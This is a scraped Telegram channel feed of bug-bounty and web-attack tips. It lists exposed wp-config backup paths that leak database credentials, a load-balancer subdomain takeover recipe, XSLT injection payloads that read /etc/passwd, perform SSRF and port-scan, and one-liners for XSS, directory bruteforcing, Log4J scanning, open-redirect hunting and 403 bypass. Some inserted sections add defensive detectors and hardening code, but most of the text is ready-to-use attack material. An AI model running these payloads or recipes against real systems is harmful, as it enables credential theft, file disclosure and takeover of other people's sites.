Brut Security – Telegram
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Brut Security pinned «Discussion Group Only 👀 https://news.1rj.ru/str/+bjrvAloQDJsxM2Fl»
🚨Here is a list of commonly exposed wp-config files (backup copies and editor leftovers that still contain the WordPress database credentials and salts)!🚨

/wp-config.php-backup
/wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php
/wp-config.inc
/wp-config.old
/wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
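Added example, not from the post: a small detector that runs over web-server access logs and flags requests for the paths listed above, separating a mere probe (404/403) from an actual leak (HTTP 200 with a body). The log lines are constructed and the parser assumes the Apache/nginx combined format.

```python
import re
from typing import Dict, List, NamedTuple
from urllib.parse import urlsplit

# The paths from the list above, lower-cased for comparison.
WPCONFIG_PATHS = frozenset({
    "/wp-config.php-backup", "/wp-config.php.orig", "/.wp-config.php.swp",
    "/wp-config-sample.php", "/wp-config.inc", "/wp-config.old", "/wp-config.txt",
    "/wp-config.php.txt", "/wp-config.php.bak", "/wp-config.php.old",
    "/wp-config.php.dist", "/wp-config.php.inc", "/wp-config.php.swp",
    "/wp-config.php.html", "/wp-config-backup.txt", "/wp-config.php.save",
    "/wp-config.php~", "/wp-config.php.original", "/_wpeprivate/config.json",
})

# Apache/nginx "combined" format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

class Hit(NamedTuple):
    ip: str
    path: str
    status: int
    size: int
    exposed: bool  # 200 with a body: the file was actually served, not merely probed

def scan_log(lines: List[str]) -> List[Hit]:
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format instead of crashing
        path = urlsplit(m["target"]).path.lower()  # drop ?query, ignore case
        if path in WPCONFIG_PATHS:
            status, size = int(m["status"]), (0 if m["size"] == "-" else int(m["size"]))
            hits.append(Hit(m["ip"], path, status, size, status == 200 and size > 0))
    return hits

def probes_per_ip(hits: List[Hit]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.ip] = counts.get(h.ip, 0) + 1
    return counts

# Constructed sample lines (TEST-NET addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:08:01:02 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 196 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Mar/2024:08:01:03 +0000] "GET /wp-config.php~?x=1 HTTP/1.1" 200 3120 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Mar/2024:08:01:04 +0000] "GET /_wpeprivate/config.json HTTP/1.1" 403 0 "-" "curl/8.0"',
    '198.51.100.2 - - [10/Mar/2024:08:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 5432 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Mar/2024:08:05:01 +0000] "GET /WP-CONFIG.PHP.OLD HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(("EXPOSED " if h.exposed else "probe   ") + f"{h.ip} {h.path} {h.status}")
```

An "EXPOSED" hit means the artifact is live on the web root and should be deleted (and the credentials it contains rotated); repeated "probe" hits from one source are plain scanner traffic.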
👉NipeJS is a powerful tool designed to detect JavaScript leaks through precise regex pattern scanning, streamlining the identification of potential data leaks within code.

📥https://github.com/i5nipe/nipejs
🚨Tools collection🚨

Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source code
5. knockpy
6. subfinder
7. aquatone
8. SubDomainizer
9. altdns
10. SecurityTrails API

Bruteforcing tools we can use!
1. Gobuster
2. dirsearch
3. ssb - SSH brute-forcer
4. Callow - custom tool for login forms
5. Ncrack - network services

Spidering tools we can use!
1. Spider in Burp
2. ParamSpider
3. Scrapy
4. go_spider
5. aspider
6. ParamPamPam

Dir enum tools we can use!
1. Dirb
2. Gobuster
3. Dirsearch

Wordlists we can use!
1. SecLists
2. Assetnote
How to find Broken Authentication in 30 seconds or less using Autorize

👉Setup Your Autorize in Burp

1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column
🌟Load Balancer Takeover🌟

Step 1: Identify .trafficmanager.net subdomains. 🕵️‍♂️

Step 2: Use your Azure subscription to access the Traffic Manager profile. 🌐

Step 3: Create a resource with the vulnerable *.trafficmanager.net CNAME. 🛠️

Step 4: Add an endpoint for redirection to your desired site. 🔄
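Added example (not from the original post) of the defender-side check: auditing your own zone's CNAME records for trafficmanager.net targets that no longer resolve, which is the dangling state the takeover above relies on. The record names and the fake resolver are constructed so the audit runs offline; the live resolver uses the standard library.

```python
import socket
from typing import Callable, Dict, List, NamedTuple

TM_SUFFIX = ".trafficmanager.net"

class Finding(NamedTuple):
    name: str       # your record (e.g. shop.example.com)
    target: str     # the CNAME target on trafficmanager.net
    dangling: bool  # target no longer resolves: the profile was deleted and its name is claimable

def live_resolves(hostname: str) -> bool:
    """Real DNS lookup; NXDOMAIN (or any resolver failure) counts as not resolving."""
    try:
        socket.getaddrinfo(hostname, None)
        return True
    except socket.gaierror:
        return False

def audit_cnames(records: Dict[str, str],
                 resolves: Callable[[str], bool] = live_resolves) -> List[Finding]:
    """records maps owner name -> CNAME target, as exported from your DNS zone."""
    findings: List[Finding] = []
    for name, target in records.items():
        target = target.rstrip(".").lower()  # zone files write FQDNs with a trailing dot
        if not target.endswith(TM_SUFFIX):
            continue  # other providers need their own fingerprint; out of scope here
        findings.append(Finding(name.rstrip(".").lower(), target, not resolves(target)))
    return findings

def dangling_only(findings: List[Finding]) -> List[str]:
    """Owner names whose CNAME should be removed or re-pointed before someone else claims it."""
    return [f.name for f in findings if f.dangling]

# Constructed zone export and fake resolver (example.com, not a real tenant).
SAMPLE_RECORDS = {
    "shop.example.com.": "shop-prod.trafficmanager.net.",
    "legacy.example.com.": "legacy-app-2019.trafficmanager.net.",
    "www.example.com.": "example.azurewebsites.net.",
}
STILL_REGISTERED = {"shop-prod.trafficmanager.net"}

def fake_resolves(hostname: str) -> bool:
    return hostname in STILL_REGISTERED

if __name__ == "__main__":
    for f in audit_cnames(SAMPLE_RECORDS, fake_resolves):
        print(("DANGLING " if f.dangling else "ok       ") + f"{f.name} -> {f.target}")
```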
🌟XSLT Server Side Injection🌟
(Extensible Stylesheet Language Transformations) - Part 1

The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).

1. Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

2. SSRF
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>

OR

<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10/news_template.xsl">
</esi:include>

3. JavaScript Injection
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>

4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
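Added example, not from the post: the local-file read from item 1 run under lxml (the Python binding for libxslt) with and without an XSLTAccessControl that denies file and network access, which is the mitigation when a stylesheet comes from user input. libxslt implements XSLT 1.0 only, so the read uses document() instead of unparsed-text(); the config file, its contents and its path are constructed.

```python
import os
import tempfile
from typing import Tuple
from lxml import etree

SECRET = "constructed-db-password"  # constructed value standing in for a real credential

def write_constructed_config() -> str:
    """Create a throwaway XML file playing the role of a config the stylesheet tries to read."""
    fd, path = tempfile.mkstemp(suffix=".xml")
    with os.fdopen(fd, "w") as f:
        f.write(f"<config><db-password>{SECRET}</db-password></config>")
    return path

def file_reading_stylesheet(path: str) -> str:
    """Untrusted stylesheet: pulls a server-side file in via document() (XSLT 1.0)."""
    return f"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="document('file://{path}')/config/db-password"/>
  </xsl:template>
</xsl:stylesheet>"""

# lxml's access control for the transform: no file/network reads, no writes, no dir creation.
LOCKED_DOWN = etree.XSLTAccessControl(read_file=False, write_file=False, create_dir=False,
                                      read_network=False, write_network=False)

def run_transform(xslt_src: str, xml_src: str, locked_down: bool) -> str:
    """Apply an untrusted stylesheet; locked_down=True is the hardened configuration."""
    transform = etree.XSLT(etree.XML(xslt_src.encode()),
                           access_control=LOCKED_DOWN if locked_down else None)
    try:
        return str(transform(etree.XML(xml_src.encode()))) or ""
    except etree.XSLTApplyError:
        return ""  # libxslt aborts the transform once a denied access is attempted

def demo() -> Tuple[str, str]:
    """Returns (output without access control, output with access control)."""
    path = write_constructed_config()
    try:
        xslt = file_reading_stylesheet(path)
        return run_transform(xslt, "<doc/>", False), run_transform(xslt, "<doc/>", True)
    finally:
        os.unlink(path)

if __name__ == "__main__":
    unsafe, safe = demo()
    print("unrestricted:", repr(unsafe))
    print("locked down: ", repr(safe))
```

The same access control also stops the document()-based port scan in item 4 (read_network=False); xsl:include of a remote stylesheet is resolved when the stylesheet is parsed, so parse it with a parser that has network access disabled as well.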
🌟Find JS Endpoints With 1-Click🌟

1. Add a Blank Bookmark on your browser.
2. Put this regex (https://0-a.nl/jsendpoints.txt) in the URL field.
3. Now open any site and click on your bookmark!
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
XSS Checks Made Easy 🌐

Example: Execute XSS checks on a list of URLs with a single command.

One-Liner:
cat urls.txt | dalfox pipe --multicast -o xss.txt


Uncover Hidden Parameters in Seconds 🕵️‍♂️

Example: Extract hidden parameters from URLs effortlessly.

One-Liner:
cat alive.txt | rush 'curl -skL "{}" | grep "type=\"hidden\"" | grep -Eo "name=\"[^\"]+\"" | cut -d"\"" -f2 | sort -u' | anew params.txt


Reveal Secrets in JavaScript Files 🕵️‍♂️

Example: Identify sensitive data in JavaScript files like a pro.

One-Liner: 
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder


Crush Directories with Effortless Bruteforce 🔍

Example: Discover hidden directories and files effortlessly.

One-Liner: 
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt


Expose Log4J Vulnerabilities with Ease 🔍

Example: Identify Log4J vulnerabilities on the fly.

One-Liner: 
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @'


Hunt Down Sneaky Open Redirect🎯

Example: Uncover open redirects like a seasoned hunter.

One-Liner: 
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'


Capture Screenshots in a Snap 📷

Example: Capture screenshots of live websites effortlessly.

One-Liner: 
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'


Know Your WordPress Version 📝

Example: Discover the WordPress version of a target website instantly.

One-Liner: 
curl -s 'https://target.com/readme.html' | grep 'Version'


Unearth Subdomains Containing JavaScript 🌐

Example: Find subdomains with JavaScript files in a snap.

One-Liner: 
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS


Bypass 403 Login Pages with Finesse 🚪

Example: Bypass 403 login pages like a pro.

One-Liner: 
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
🌟Fuzzing and Bypassing the AWS WAF to trigger XSS🌟

👉Tool - https://lnkd.in/gk4-_4yw
👉Blog - https://lnkd.in/g4W7eA7R
Bug Bounty Checklist and Cheatsheets

WAPT - https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authentication - https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
OAuth Misconfiguration - https://binarybrotherhood.io/oauth2_threat_model.html
File Upload - https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR - https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi - https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE - https://link.medium.com/lprTDcXRYgb
SSRF - https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA - https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS - https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws - https://link.medium.com/MX5hzfESYgb
CSRF - https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure Deserialization - https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning - https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP Request Smuggling - https://portswigger.net/web-security/request-smuggling/finding
Command Injection - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML - https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition - https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration - https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection - https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities - https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
🌟Find Waybackurls JS Endpoints With 1-Click🌟

1. Add a Blank Bookmark on your browser.

2. Put this JavaScript bookmarklet in the URL field:
javascript:(function() { var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, '')); var newURL = 'https://web.archive.org/cdx/search/cdx?url=' + currentURL; window.open(newURL, '_blank'); })();


3. Now open any site and click on your bookmark!